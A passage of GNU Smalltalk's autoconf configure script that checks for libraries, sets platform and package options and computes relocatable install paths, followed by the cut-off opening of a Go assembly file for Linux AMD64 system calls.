AM_PATH_LISPDIR
GST_PATH_LISPSTARTDIR
GST_EMACS_PACKAGE(comint)
AM_CONDITIONAL(WITH_EMACS, test "$EMACS" != no)
AM_CONDITIONAL(WITH_EMACS_COMINT, test "$ac_cv_emacs_comint" != no)
dnl We only want the GNU implementations
AM_MISSING_PROG(LEX, flex, $missing_dir)
AM_MISSING_PROG(YACC, bison, $missing_dir)
AM_MISSING_PROG(GPERF, gperf, $missing_dir)
AM_MISSING_PROG(AUTOM4TE, autom4te, $missing_dir)
dnl
dnl ------------------------------ SUBDIRS --------------------
PKG_CHECK_MODULES(GNUTLS, gnutls,
[ac_cv_lib_gnutls_gnutls_global_init=yes],
[GST_HAVE_LIB(gnutls, gnutls_global_init)])
if test "$ac_cv_lib_gnutls_gnutls_global_init" = yes; then
AC_DEFINE(HAVE_GNUTLS, 1, [Define to 1 if gnutls is being used])
fi
AC_ARG_WITH(system-libltdl,
[ --with-system-libltdl[=PATH] use system libltdl.la (search in PATH if given)],
[], [with_system_libltdl=detect])
GST_HAVE_LIB([ltdl], [lt_dlopen])
case $with_system_libltdl in
yes|no|detect)
if test $ac_cv_lib_ltdl_lt_dlopen = no; then
AC_MSG_ERROR([libltdl is required to compile GNU Smalltalk])
elif test $with_system_libltdl = no; then
AC_MSG_WARN([libltdl is required to compile GNU Smalltalk])
AC_MSG_WARN([ignoring --without-system-libltdl])
fi
INCLTDL= LIBLTDL=-lltdl
;;
*)
INCLTDL="-I$with_system_libltdl/../include"
LIBLTDL="-L$with_system_libltdl -lltdl"
esac
AC_SUBST(INCLTDL)
AC_SUBST(LIBLTDL)
AC_ARG_WITH(system-libffi,
[ --with-system-libffi[=PATH] use system libffi.la (search in PATH if given)],
[], [with_system_libffi=detect])
PKG_CHECK_MODULES(LIBFFI, libffi,
[ac_cv_lib_libffi_ffi_prep_cif=yes],
[GST_HAVE_LIB(libffi, ffi_prep_cif)])
case $with_system_libffi in
yes|no|detect)
if test $ac_cv_lib_libffi_ffi_prep_cif = no; then
AC_MSG_ERROR([libffi is required to compile GNU Smalltalk])
elif test $with_system_libffi = no; then
AC_MSG_WARN([libffi is required to compile GNU Smalltalk])
AC_MSG_WARN([ignoring --without-system-libffi])
fi
INCFFI=$LIBFFI_CFLAGS
LIBFFI=${LIBFFI_LIBS:-'-lffi'}
;;
*)
INCFFI="-I$with_system_libffi/../include"
LIBFFI="-L$with_system_libffi -lffi"
esac
case $host in
*-*-darwin[[912]]* ) LIBFFI_EXECUTABLE_LDFLAGS=-Wl,-allow_stack_execute ;;
*) LIBFFI_EXECUTABLE_LDFLAGS= ;;
esac
AC_SUBST(INCFFI)
AC_SUBST(LIBFFI)
AC_SUBST(LIBFFI_EXECUTABLE_LDFLAGS)
case $ac_configure_args in
*--enable-subdir) ;;
*) ac_configure_args="$ac_configure_args --enable-subdir" ;;
esac
AC_SNPRINTFV_CONVENIENCE
AC_CONFIG_SUBDIRS(snprintfv)
AC_ARG_ENABLE(generational-gc,
[ --disable-generational-gc disable generational garbage collection], ,
[case $host in
*-k*bsd-gnu | \
*-*-cygwin* | *-*-mingw* | \
ia64-*-* | alpha*-*-* | sparc*-*-* )
enable_generational_gc=no ;;
*)
enable_generational_gc=yes ;;
esac])
AC_ARG_WITH(system-libsigsegv,
[ --with-system-libsigsegv[=PATH] use system libsigsegv.la likewise],
[], [with_system_libsigsegv=detect])
GST_HAVE_LIB([sigsegv], [sigsegv_install_handler])
if test $enable_generational_gc = no; then
INCSIGSEGV= LIBSIGSEGV=
else
case $with_system_libsigsegv in
yes|no|detect)
if test $ac_cv_lib_sigsegv_sigsegv_install_handler = no; then
AC_MSG_ERROR([libsigsegv is required by default to compile GNU Smalltalk.
To proceed, configure with --disable-generational-gc.])
elif test $with_system_libsigsegv = no; then
AC_MSG_WARN([libsigsegv is required by default to compile GNU Smalltalk.])
AC_MSG_WARN([You specified --without-system-libsigsegv, but it will be])
AC_MSG_WARN([ignored; if you wanted to avoid using libsigsegv altogether])
AC_MSG_WARN([you should use --disable-generational-gc instead.])
fi
INCSIGSEGV= LIBSIGSEGV=-lsigsegv
;;
*)
INCSIGSEGV="-I$with_system_libsigsegv/../include"
LIBSIGSEGV="-L$with_system_libsigsegv -lsigsegv"
esac
AC_DEFINE(HAVE_SIGSEGV_H, 1, [Define to 1 if libsigsegv is being used])
fi
AC_SUBST(INCSIGSEGV)
AC_SUBST(LIBSIGSEGV)
AC_ARG_WITH(imagedir,
[ --with-imagedir=PATH path where to place the system image
(default: /usr/local/var/lib/$PACKAGE)],
[imagedir="$withval"],
[imagedir=`echo "$libdir" | sed \
-e 's,${exec_prefix},${localstatedir},' \
-e "s,${exec_prefix},\${localstatedir}," `/$PACKAGE ])
AC_SUBST(imagedir)
AC_ARG_WITH(moduledir,
[ --with-moduledir=PATH path where to look for modules
(default: /usr/local/lib/$PACKAGE)],
[moduledir="$withval"],
[moduledir='${pkglibdir}'])
moduleexecdir='${moduledir}'
AC_SUBST(moduledir)
AC_SUBST(moduleexecdir)
dnl
dnl ------------------------------ C COMPILER / OS ------------
{ echo; echo "${term_bold}Platform environment:${term_norm}"; } >& AS_MESSAGE_FD
GST_C_SYNC_BUILTINS
if test $gst_cv_have_sync_fetch_and_add = no; then
AC_MSG_ERROR([Synchronization primitives not found, please use a newer compiler.])
fi
GST_LOCK
AC_SYS_LARGEFILE
AC_C_INLINE
AC_C_RESTRICT
dnl Test for broken solaris include file. Should be moved to gnulib maybe?
AC_MSG_CHECKING([for broken sys/avl.h])
AC_PREPROC_IFELSE([AC_LANG_SOURCE([#include <sys/avl.h>
#ifndef _AVL_H
would be useless anyway
#endif
])], [
AC_MSG_RESULT(yes)
AC_DEFINE(_AVL_H, 1,
[Define to 1 if, like Solaris, your system has a sys/avl.h header that
pollutes the name space.])], [
AC_MSG_RESULT(no)])
GST_C_HIDDEN_VISIBILITY
GST_C_LONG_DOUBLE
GST_C_GOTO_VOID_P
AC_DEFINE_UNQUOTED(HOST_SYSTEM, "$host",
[Define to the host triplet.])
AC_DEFINE_UNQUOTED(EXEEXT, "$ac_exeext",
[Define to the extension for executable files.])
case "$ac_exeext:$host_os" in
:*) ac_argv_exeext= ;;
.exe:cygwin*) ac_argv_exeext= ;;
.exe:*) ac_argv_exeext=$ac_exeext ;;
esac
AC_DEFINE_UNQUOTED(ARGV_EXEEXT, "$ac_argv_exeext",
[Define to the extension for executable files, as it appears in argv[0].])
AC_C_BIGENDIAN
AC_CHECK_ALIGNOF(double)
AC_CHECK_ALIGNOF(long double)
AC_CHECK_ALIGNOF(long long)
AC_CHECK_SIZEOF(off_t)
AC_CHECK_SIZEOF(int)
AC_CHECK_SIZEOF(long)
AC_CHECK_SIZEOF(wchar_t, , [[
#include <wchar.h>]])
AC_CHECK_SIZEOF(OOP, , [[
typedef void *OOP;]])
AC_LIBTOOL_DLOPEN
AC_LIBTOOL_WIN32_DLL
AC_PROG_LIBTOOL
LIBGST_CFLAGS="$SYNC_CFLAGS"
case '$host_cpu: $CFLAGS ' in
i*86:*' -pg '*) ;;
i*86:*) LIBGST_CFLAGS="$LIBGST_CFLAGS -fomit-frame-pointer" ;;
*) ;;
esac
AC_SUBST(LIBGST_CFLAGS)
case "$host_os:$WINDRES" in
*:no) ICON= ;;
cygwin*|mingw*) ICON=gsticon.o ;;
*) ICON= ;;
esac
AC_SUBST(ICON)
dnl
dnl ------------------------------- C LIBRARY -----------------
{ echo; echo "${term_bold}C library features:${term_norm}"; } >& AS_MESSAGE_FD
AC_TYPE_SIGNAL
AC_TYPE_PID_T
AC_TYPE_SIZE_T
AC_HEADER_ASSERT
AC_CHECK_HEADERS_ONCE(stdint.h inttypes.h unistd.h poll.h sys/ioctl.h \
sys/resource.h sys/utsname.h stropts.h sys/param.h stddef.h limits.h \
sys/timeb.h termios.h sys/mman.h sys/file.h execinfo.h utime.h \
sys/select.h sys/wait.h fcntl.h crt_externs.h, [], [], [AC_INCLUDES_DEFAULT])
AC_CHECK_MEMBERS([struct stat.st_mtim.tv_nsec, struct stat.st_mtimensec,
struct stat.st_mtimespec.tv_nsec])
AC_TYPE_INT8_T
AC_TYPE_INT16_T
AC_TYPE_INT32_T
AC_TYPE_INT64_T
AC_TYPE_INTMAX_T
AC_TYPE_INTPTR_T
AC_TYPE_UINT8_T
AC_TYPE_UINT16_T
AC_TYPE_UINT32_T
AC_TYPE_UINT64_T
AC_TYPE_UINTMAX_T
AC_TYPE_UINTPTR_T
if test x$ac_cv_header_poll_h = xno; then
AC_CONFIG_LINKS([lib-src/poll.h:lib-src/poll_.h])
fi
AC_FUNC_ALLOCA
AC_FUNC_OBSTACK
AC_CHECK_LIB(m, atan)
GST_REPLACE_POLL
gt_FUNC_SETENV
GST_SOCKETS
AC_REPLACE_FUNCS(putenv strdup strerror strsignal mkstemp getpagesize \
getdtablesize strstr ftruncate floorl ceill sqrtl frexpl ldexpl asinl \
acosl atanl logl expl tanl sinl cosl powl truncl lrintl truncf lrintf \
lrint trunc strsep strpbrk symlink mkdtemp)
AC_CHECK_FUNCS_ONCE(gethostname memcpy memmove sighold uname usleep lstat \
grantpt popen getrusage gettimeofday fork strchr utimes utime readlink \
sigsetmask alarm select mprotect madvise waitpid accept4 \
setsid spawnl pread pwrite _NSGetExecutablePath _NSGetEnviron \
chown getgrnam getpwnam endgrent endpwent setgroupent setpassent)
if test "$ac_cv_func__NSGetEnviron" = yes; then
AC_DEFINE([environ], [_NSGetEnviron()],
[Define to an appropriate function call if the system does not provide the
environ variable.])
fi
AC_SEARCH_LIBS([nanosleep], [rt])
if test "$ac_cv_search_nanosleep" != no; then
AC_DEFINE(HAVE_NANOSLEEP, 1,
[Define if the system provides nanosleep.])
fi
AC_SEARCH_LIBS([clock_gettime], [rt])
if test "$ac_cv_search_clock_gettime" != no; then
AC_DEFINE(HAVE_CLOCK_GETTIME, 1,
[Define if the system provides clock_gettime.])
fi
AC_SEARCH_LIBS([timer_create], [rt])
if test "$ac_cv_search_timer_create" != no; then
AC_DEFINE(HAVE_TIMER_CREATE, 1,
[Define if the system provides timer_create.])
fi
GST_FUNC_LRINT
GST_FUNC_STRTOUL
GST_FUNC_LOCALTIME
dnl ------------------------- OTHER LIBRARIES -------------------
{ echo; echo "${term_bold}Auxiliary libraries:${term_norm}"; } >& AS_MESSAGE_FD
GST_LIBC_SO_NAME
GST_HAVE_GMP
GST_HAVE_READLINE
GST_PACKAGE_ALLOW_DISABLING
GST_PACKAGE_PREFIX([packages])
GST_PACKAGE_DEPENDENCIES([gst-tool$(EXEEXT) gst.im $(WINEWRAPPERDEP)])
GST_PACKAGE_ENABLE([Announcements], [announcements])
GST_PACKAGE_ENABLE([BloxTK], [blox/tk],
[GST_HAVE_TCLTK],
[gst_cv_tcltk_libs],
[Makefile], [blox-tk.la])
GST_PACKAGE_ENABLE([BLOXBrowser], [blox/browser])
GST_PACKAGE_ENABLE([Complex], [complex])
GST_PACKAGE_ENABLE([Continuations], [continuations])
GST_PACKAGE_ENABLE([CParser], [cpp])
GST_PACKAGE_ENABLE([DebugTools], [debug])
GST_PACKAGE_ENABLE([ObjectDumper], [object-dumper])
GST_PACKAGE_ENABLE([DBD-MySQL], [dbd-mysql])
AC_MSG_CHECKING([whether to run MySQL tests])
AC_ARG_ENABLE(mysql-tests,
[ --enable-mysql-tests=USER:PWD:DATABASE
test MySQL bindings [default=root:root:test]], ,
[enable_mysql_tests=no])
AC_SUBST(enable_mysql_tests)
AC_MSG_RESULT($enable_mysql_tests)
GST_PACKAGE_ENABLE([DBD-PostgreSQL], [dbd-postgresql],
[GST_HAVE_LIB(pq, PQconnectdb)],
[ac_cv_lib_pq_PQconnectdb])
GST_PACKAGE_ENABLE([DBD-SQLite], [dbd-sqlite],
[AC_CHECK_HEADER([sqlite3.h])
GST_HAVE_LIB(sqlite3, sqlite3_clear_bindings)],
[ac_cv_header_sqlite3_h],
[Makefile], [dbd-sqlite3.la])
GST_PACKAGE_ENABLE([DBI], [dbi])
GST_PACKAGE_ENABLE([GDBM], [gdbm],
[AC_CHECK_HEADER([gdbm.h])],
[ac_cv_header_gdbm_h],
[Makefile], [gdbm.la])
GST_PACKAGE_ENABLE([Glorp], [glorp])
GST_PACKAGE_ENABLE([Cairo], [cairo],
[PKG_CHECK_MODULES([CAIRO], cairo, [gst_cv_cairo=yes], [gst_cv_cairo=no])],
[gst_cv_cairo])
GST_PACKAGE_ENABLE([GLib], [glib], [
AM_PATH_GLIB_2_0(2.0.0, [
PKG_CHECK_MODULES(GTHREAD, gthread-2.0 >= 2.0.0,
[gst_cv_glib=yes], [gst_cv_glib=no])
], [], gobject)
if test $gst_cv_glib = yes; then
ac_save_LIBS=$LIBS
ac_save_CFLAGS=$CFLAGS
LIBS="$LIBS $GLIB_LIBS"
CFLAGS="$CFLAGS $GLIB_CFLAGS"
AC_CHECK_FUNCS([g_poll])
if test $ac_cv_func_g_poll = no; then
AC_DEFINE([g_poll], [poll], [Define to poll if your glib does not provide g_poll.])
fi
LIBS=$ac_save_LIBS
CFLAGS=$ac_save_CFLAGS
fi],
[gst_cv_glib],
[Makefile], [gst-glib.la libgst-gobject.la])
GST_PACKAGE_ENABLE([GObject-Introspection], [gir], [
PKG_CHECK_MODULES(GIR, gobject-introspection-1.0 >= 0.9.3,
[gst_cv_gir=yes], [gst_cv_gir=no])],
[gst_cv_gir])
GST_PACKAGE_ENABLE([GTK], [gtk], [
AC_ARG_ENABLE(gtk,
[ --enable-gtk={yes,no,blox}
enable GTK+ bindings. Blox/GTK is experimental.], ,
enable_gtk=yes)
if test "$enable_gtk" != no && test "$gst_cv_glib" != no; then
maybe_enable_gtk=$enable_gtk
enable_gtk=no
AM_PATH_GTK_2_0(2.0.0,
[PKG_CHECK_MODULES(ATK, atk >= 1.0.0,
[PKG_CHECK_MODULES(PANGO, pango >= 1.0.0,
[enable_gtk=$maybe_enable_gtk], :)], [:])])
fi],
[enable_gtk gst_cv_cairo],
[Makefile], [gst-gtk.la])
GST_PACKAGE_ENABLE([BloxGTK], [blox/gtk],, [enable_gtk])
GST_PACKAGE_ENABLE([Blox], [blox/tests],
[enable_blox=no
case x"$enable_gtk" in
xno|xnot\ found) ;; *) enable_blox=yes ;; esac
case x"$gst_cv_tcltk_libs" in
xno|xnot\ found) ;; *) enable_blox=yes ;; esac],
[enable_blox], [package.xml])
GST_PACKAGE_ENABLE([WebServer], [httpd])
GST_PACKAGE_ENABLE([I18N], [i18n],
[AC_CHECK_FUNCS_ONCE([nl_langinfo])
AM_LANGINFO_CODESET
AM_ICONV],
[ac_cv_func_nl_langinfo am_cv_func_iconv],
[Makefile], [i18n.la])
GST_PACKAGE_ENABLE([Iconv], [iconv],
[AM_ICONV],
[am_cv_func_iconv],
[Makefile], [iconv.la])
GST_PACKAGE_ENABLE([Java], [java])
GST_PACKAGE_ENABLE([Digest], [digest], [], [], [Makefile], [digest.la])
GST_PACKAGE_ENABLE([GNUPlot], [gnuplot])
GST_PACKAGE_ENABLE([Magritte], [magritte])
GST_PACKAGE_ENABLE([Magritte-Seaside], [seaside/magritte])
GST_PACKAGE_ENABLE([NCurses],
[ncurses],
[GST_HAVE_LIB(ncurses, initscr)],
[ac_cv_lib_ncurses_initscr])
GST_PACKAGE_ENABLE([NetClients], [net], [], [], [Makefile])
GST_PACKAGE_ENABLE([DhbNumericalMethods], [numerics])
GST_PACKAGE_ENABLE([OpenGL], [opengl],
[GST_HAVE_OPENGL],
[gst_cv_opengl_libs],
[Makefile], [gstopengl.la])
GST_PACKAGE_ENABLE([GLUT], [glut],
[GST_HAVE_GLUT],
[gst_cv_glut_libs],
[Makefile], [gstglut.la])
GST_PACKAGE_ENABLE([LibSDL], [sdl/libsdl],
[PKG_CHECK_MODULES(SDL, sdl >= 1.2.0, [gst_cv_sdl=yes], [gst_cv_sdl=no])
case "$SDL_LIBS" in
*-framework,Cocoa* | *"-framework Cocoa"*) gst_cv_sdl_uses_cocoa=yes ;;
*) gst_cv_sdl_uses_cocoa=no ;;
esac
save_CFLAGS=$CFLAGS
save_LIBS=$LIBS
CFLAGS="$CFLAGS $SDL_CFLAGS"
LIBS="$LIBS $SDL_LIBS"
AC_LINK_IFELSE([AC_LANG_SOURCE([
#include <SDL.h>
#include <SDL_main.h>
int main(int argc, char **argv) { SDL_Init(0); return 0; }])],
[], [gst_cv_sdl=no])
LIBS=$save_LIBS
CFLAGS=$save_CFLAGS
# We do SDLmain's job on our own, and mingw32 is linked automatically
# into the DLL. If we do not do this, libtool refuses to create a DLL
# for the SDL module.
SDL_LIBS=`echo " $SDL_LIBS " | sed 's/ -lSDLmain / /; s/ -lmingw32 / /' `
AM_CONDITIONAL([HAVE_COCOA], [test $gst_cv_sdl_uses_cocoa = yes])],
[gst_cv_sdl],
[Makefile], [sdl.la])
GST_PACKAGE_ENABLE([LibSDL_GL], [sdl/libsdl_gl], [],
[gst_cv_sdl gst_cv_opengl_libs])
GST_PACKAGE_ENABLE([CairoSDL], [sdl/cairo],
[],
[gst_cv_cairo gst_cv_sdl])
GST_PACKAGE_ENABLE([LibSDL_image], [sdl/libsdl_image],
[GST_HAVE_LIB(SDL_image, IMG_Linked_Version)],
[ac_cv_lib_SDL_image_IMG_Linked_Version])
GST_PACKAGE_ENABLE([LibSDL_mixer], [sdl/libsdl_mixer],
[GST_HAVE_LIB(SDL_mixer, Mix_Linked_Version)],
[ac_cv_lib_SDL_mixer_Mix_Linked_Version])
GST_PACKAGE_ENABLE([LibSDL_sound], [sdl/libsdl_sound],
[GST_HAVE_LIB(SDL_sound, Sound_GetLinkedVersion)],
[ac_cv_lib_SDL_sound_Sound_GetLinkedVersion])
GST_PACKAGE_ENABLE([LibSDL_ttf], [sdl/libsdl_ttf],
[GST_HAVE_LIB(SDL_ttf, TTF_Init)],
[ac_cv_lib_SDL_ttf_TTF_Init])
GST_PACKAGE_ENABLE([Compiler], [stinst/compiler])
GST_PACKAGE_ENABLE([Parser], [stinst/parser])
GST_PACKAGE_ENABLE([ClassPublisher], [stinst/doc])
GST_PACKAGE_ENABLE([ProfileTools], [profile])
GST_PACKAGE_ENABLE([ROE], [roe])
GST_PACKAGE_ENABLE([SandstoneDb], [sandstonedb])
GST_PACKAGE_ENABLE([Seaside-Core], [seaside/core])
GST_PACKAGE_ENABLE([Seaside-Development], [seaside/dev])
GST_PACKAGE_ENABLE([Seaside-Examples], [seaside/examples])
GST_PACKAGE_ENABLE([Seaside], [seaside/swazoo])
GST_PACKAGE_ENABLE([Sport], [sport])
GST_PACKAGE_ENABLE([SUnit], [sunit])
GST_PACKAGE_ENABLE([Swazoo], [swazoo-httpd])
GST_PACKAGE_ENABLE([Sockets], [sockets], [], [gst_cv_sockets])
GST_PACKAGE_ENABLE([VFSAddOns], [vfs], [], [], [Makefile])
GST_PACKAGE_ENABLE([VisualGST], [visualgst])
GST_PACKAGE_ENABLE([XML-XMLNodeBuilder], [xml/builder])
GST_PACKAGE_ENABLE([XML-DOM], [xml/dom])
GST_PACKAGE_ENABLE([XML-ParserTests], [xml/tests])
GST_PACKAGE_ENABLE([XML-PullParser], [xml/pullparser])
GST_PACKAGE_ENABLE([XML-Expat], [xml/expat],
[AC_CHECK_HEADER([expat.h])
GST_HAVE_LIB(expat, XML_ParserCreateNS)],
[ac_cv_header_expat_h ac_cv_lib_expat_XML_ParserCreateNS],
[Makefile], [expat.la])
GST_PACKAGE_ENABLE([XML-XMLParser], [xml/parser])
GST_PACKAGE_ENABLE([XML-SAXDriver], [xml/saxdriver])
GST_PACKAGE_ENABLE([XML-SAXParser], [xml/saxparser])
GST_PACKAGE_ENABLE([XPath], [xml/xpath])
GST_PACKAGE_ENABLE([XSL], [xml/xsl])
GST_PACKAGE_ENABLE([ZLib],
[zlib],
[AC_CHECK_HEADER([zlib.h])
GST_HAVE_LIB(z, inflate)],
[ac_cv_header_zlib_h ac_cv_lib_z_inflate],
[Makefile], [zlib.la])
if test "$enable_gtk" = blox; then
BLOX_IMPLEMENTATION=BloxGTK
else
BLOX_IMPLEMENTATION=BloxTK
fi
AC_SUBST(BLOX_IMPLEMENTATION)
AC_ARG_ENABLE(jit,
[ --enable-jit enable dynamic translation to machine code], ,
enable_jit=no)
LIGHTNING_CONFIGURE_IF_NOT_FOUND([], enable_jit=no)
if test "$enable_jit" != no; then
AC_DEFINE(ENABLE_JIT_TRANSLATION, 1,
[Define to enable dynamic translation to machine code])
fi
AC_ARG_ENABLE(disassembler,
[ --enable-disassembler include a disassembler in the gst executable], ,
enable_disassembler=no)
AM_CONDITIONAL(ENABLE_DISASSEMBLER, test "$enable_disassembler" != no)
if test "$enable_disassembler" != no; then
AC_DEFINE(ENABLE_DISASSEMBLER, 1,
[Define to include a disassembler in the gst executable])
fi
AC_ARG_ENABLE(dld,
[ --disable-dld disable loading of external modules at runtime], ,
enable_dld=yes)
if test "$enable_dld" != no; then
AC_DEFINE(ENABLE_DLD, 1,
[Define to enable usage of libltdl to load external modules at runtime])
fi
AC_ARG_ENABLE(checking,
[ --enable-checking enable assertions at runtime], ,
enable_checking=no)
if test "$enable_checking" = no; then
AC_DEFINE(OPTIMIZE, 1,
[Define to disable assertion checking at runtime])
fi
AC_ARG_ENABLE(preemption,
[ --enable-preemption enable preemptive multitasking], ,
enable_preemption=no)
if test "$enable_preemption" != no; then
AC_DEFINE(ENABLE_PREEMPTION, 1,
[Define to enable preemptive multitasking of Smalltalk processes])
fi
GST_ARG_ENABLE_MODULES([Blox,TCP])
dnl
dnl ------------------------------- RELOCATABILITY ------------
# See if we can make the installed binaries relocatable
AC_MSG_CHECKING([whether to enable relocatable install])
AC_RELOCATABLE_NOP
relocatable_reason=$RELOCATABLE
# First of all, compute the final paths for the various components.
AC_LIB_PREPARE_PREFIX
acl_final_datadir=`echo "${datadir}" | sed \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_bindir=`echo "${bindir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_libdir=`echo "${libdir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_libexecdir=`echo "${libexecdir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_pkgdatadir="$acl_final_datadir/$PACKAGE"
acl_final_pkglibdir="$acl_final_libdir/$PACKAGE"
acl_final_imagedir=`echo "${imagedir}" | sed \
-e "s,\\\${localstatedir},$localstatedir," \
-e "s,\\\${pkgdatadir},$pkgdatadir," \
-e "s,\\\${datadir},$datadir," \
-e "s,\\\${docdir},$docdir," \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${pkglibdir},$acl_final_pkglibdir," \
-e "s,\\\${libdir},$acl_final_libdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_moduledir=`echo "${moduledir}" | sed \
-e "s,\\\${localstatedir},$localstatedir," \
-e "s,\\\${pkgdatadir},$pkgdatadir," \
-e "s,\\\${datadir},$datadir," \
-e "s,\\\${docdir},$docdir," \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${pkglibdir},$acl_final_pkglibdir," \
-e "s,\\\${libdir},$acl_final_libdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
# If shared libraries are enabled, there are a few extra constraints.
if test "$enable_shared" != no; then
case $host in
*-*-cygwin* | *-*-mingw*)
# For Windows, the shared library will be installed in bindir anyway
;;
*-gnu*)
# For glibc, we can use a relative rpath via -Wl,-rpath,...
case "$acl_final_libdir" in
"${acl_final_exec_prefix}"/*) ;;
/*) relocatable_reason='no, libdir outside exec_prefix' ;;
*) relocatable_reason='no, relative libdir' ;;
esac
;;
*)
relocatable_reason="no,
relocatable shared libraries not supported on $host"
;;
esac
fi
# Further OS-independent tests ensure that we can make relative
# paths from the executable's location.
if test "$relocatable_reason" = yes; then
case "${acl_final_bindir}" in
"${acl_final_exec_prefix}") ;;
"${acl_final_exec_prefix}"/*) ;;
/*) relocatable_reason='no, bindir outside exec_prefix' ;;
*) relocatable_reason='no, relative bindir' ;;
esac
case "${acl_final_libexecdir}" in
"${acl_final_exec_prefix}") ;;
${acl_final_exec_prefix}/*) ;;
/*) relocatable_reason='no, libexecdir outside exec_prefix' ;;
*) relocatable_reason='no, relative libexecdir' ;;
esac
case "${acl_final_datadir}" in
${acl_final_prefix}) ;;
${acl_final_prefix}/*) ;;
/*) relocatable_reason='no, datadir outside prefix' ;;
*) relocatable_reason='no, relative datadir' ;;
esac
case "${acl_final_imagedir}" in
${acl_final_prefix}) ;;
${acl_final_prefix}/*) ;;
/*) relocatable_reason='no, imagedir outside prefix' ;;
*) relocatable_reason='no, relative imagedir' ;;
esac
case "${acl_final_moduledir}" in
${acl_final_prefix}) ;;
${acl_final_prefix}/*) ;;
/*) relocatable_reason='no, moduledir outside prefix' ;;
*) relocatable_reason='no, relative moduledir' ;;
esac
test "$acl_final_prefix" != "$acl_final_exec_prefix" && \
relocatable_reason='no, prefix does not match exec prefix'
fi
# echo the relative path from ${acl_final_bindir} to $1
# (Works only if both are absolute.)
[func_make_relpath ()
{
dir=$1
idir=${acl_final_bindir}
while true; do
dfirst=`echo "$dir" | sed -n -e 's,^//*\([^/]*\).*$,/\1,p'`
ifirst=`echo "$idir" | sed -n -e 's,^//*\([^/]*\).*$,/\1,p'`
test x"$dfirst" = x && break
test x"$ifirst" = x && break
test "$dfirst" != "$ifirst" && break
dir=`echo "$dir" | sed -e 's,^//*[^/]*,,'`
idir=`echo "$idir" | sed -e 's,^//*[^/]*,,'`
done
idir=`echo "$idir" | sed -e 's,//*[^/]*,/..,g' -e 's,^/,,' `
echo "${idir:-.}$dir"
}]
case "$relocatable_reason" in
yes)
# Command-line option to include a relative search path for
# shared libraries
if test "$enable_shared" != no; then
case "$host" in
*-linux*)
RELOC_LDFLAGS='-Wl,-rpath,"\$$ORIGIN/'`func_make_relpath ${acl_final_libdir}`'"'
;;
esac
fi
KERNEL_PATH=`func_make_relpath ${acl_final_pkgdatadir}/kernel`
IMAGE_PATH=`func_make_relpath ${acl_final_imagedir}`
MODULE_PATH=`func_make_relpath ${acl_final_moduledir}`
LIBEXEC_PATH=`func_make_relpath "${acl_final_libexecdir}/${PACKAGE}"`
PREFIX=`func_make_relpath "${acl_final_prefix}"`
EXEC_PREFIX=`func_make_relpath "${acl_final_exec_prefix}"`
AC_DEFINE_UNQUOTED(KERNEL_PATH, "$KERNEL_PATH",
[The relative path from the program to the kernel path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(IMAGE_PATH, "$IMAGE_PATH",
[The relative path from the program to the image path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(MODULE_PATH, "$MODULE_PATH",
[The relative path from the program to the module path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(LIBEXEC_PATH, "$LIBEXEC_PATH",
[The relative path from the program to the per-package
libexec path. Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(PREFIX, "$PREFIX",
[The relative path from the program to the prefix.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(EXEC_PREFIX, "$EXEC_PREFIX",
[The relative path from the program to the exec_prefix.
Defined only for relocatable installs.])
;;
*)
# Pass paths on the command-line to allow specifying a prefix at "make"
# time.
RELOC_CPPFLAGS='-DKERNEL_PATH=\""${pkgdatadir}/kernel"\" \
-DIMAGE_PATH=\""${imagedir}"\" \
-DMODULE_PATH=\""${moduledir}"\" \
-DLIBEXEC_PATH=\""${libexecdir}/${PACKAGE}"\" \
-DPREFIX=\""${prefix}"\" \
-DEXEC_PREFIX=\""${exec_prefix}"\" '
;;
esac
RELOC_CPPFLAGS=$RELOC_CPPFLAGS' \
-DDEFAULT_EXECUTABLE=\""${bindir}/gst${EXEEXT}"\"'
AC_MSG_RESULT([$relocatable_reason])
AC_SUBST(RELOC_CPPFLAGS)
AC_SUBST(RELOC_LDFLAGS)
dnl
dnl ------------------------------- FILE GENERATION -----------
{ echo; echo "${term_bold}Output substitutions:${term_norm}"; } >& AS_MESSAGE_FD
AC_CONFIG_COMMANDS_PRE([
LTLIBOBJS=`echo "$LIB@&t@OBJS" |
sed 's,\.[[^.]]* ,.lo ,g;s,\.[[^.]]*$,.lo,'`
LTALLOCA=`echo "$ALLOCA" | sed 's/\.o/.lo/g'`
])
GST_RUN='$(top_builddir)/gst -I $(top_builddir)/gst.im -f'
AC_SUBST(GST_RUN)
AC_SUBST(CFLAGS)
AC_SUBST(INCLTDL)
AC_SUBST(LIBLTDL)
AC_SUBST(LTALLOCA)
AC_SUBST(LTLIBOBJS)
dnl Scripts & data files
AC_CONFIG_FILES(gnu-smalltalk.pc)
AC_CONFIG_FILES(gst-config, chmod +x gst-config)
AC_CONFIG_FILES(tests/gst, chmod +x tests/gst)
AC_CONFIG_FILES(tests/atlocal)
dnl Master Makefile
AC_CONFIG_FILES(Makefile)
dnl VM makefiles
AC_CONFIG_FILES(doc/Makefile lib-src/Makefile libgst/Makefile)
AC_CONFIG_FILES(opcode/Makefile lightning/Makefile tests/Makefile)
AC_OUTPUT
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for AMD64, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
